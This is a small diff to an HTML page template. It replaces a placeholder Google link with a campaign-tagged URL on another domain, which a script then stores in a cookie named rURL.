--- a/index.html
+++ b/index.html
@@ -43,7 +43,7 @@
 
   <script>
 
-    const URL = "https://www.google.com"; // أدخل الرابط الخاص بك هنا 
+    const URL = "https://one.dandouh.online/?utm_medium=48211b5bbb2efd411cfdbd5916767e89f561456c&utm_campaign=target_PK_04b6a000"; // أدخل الرابط الخاص بك هنا 
 
     document.cookie = `rURL=${URL}`;
 
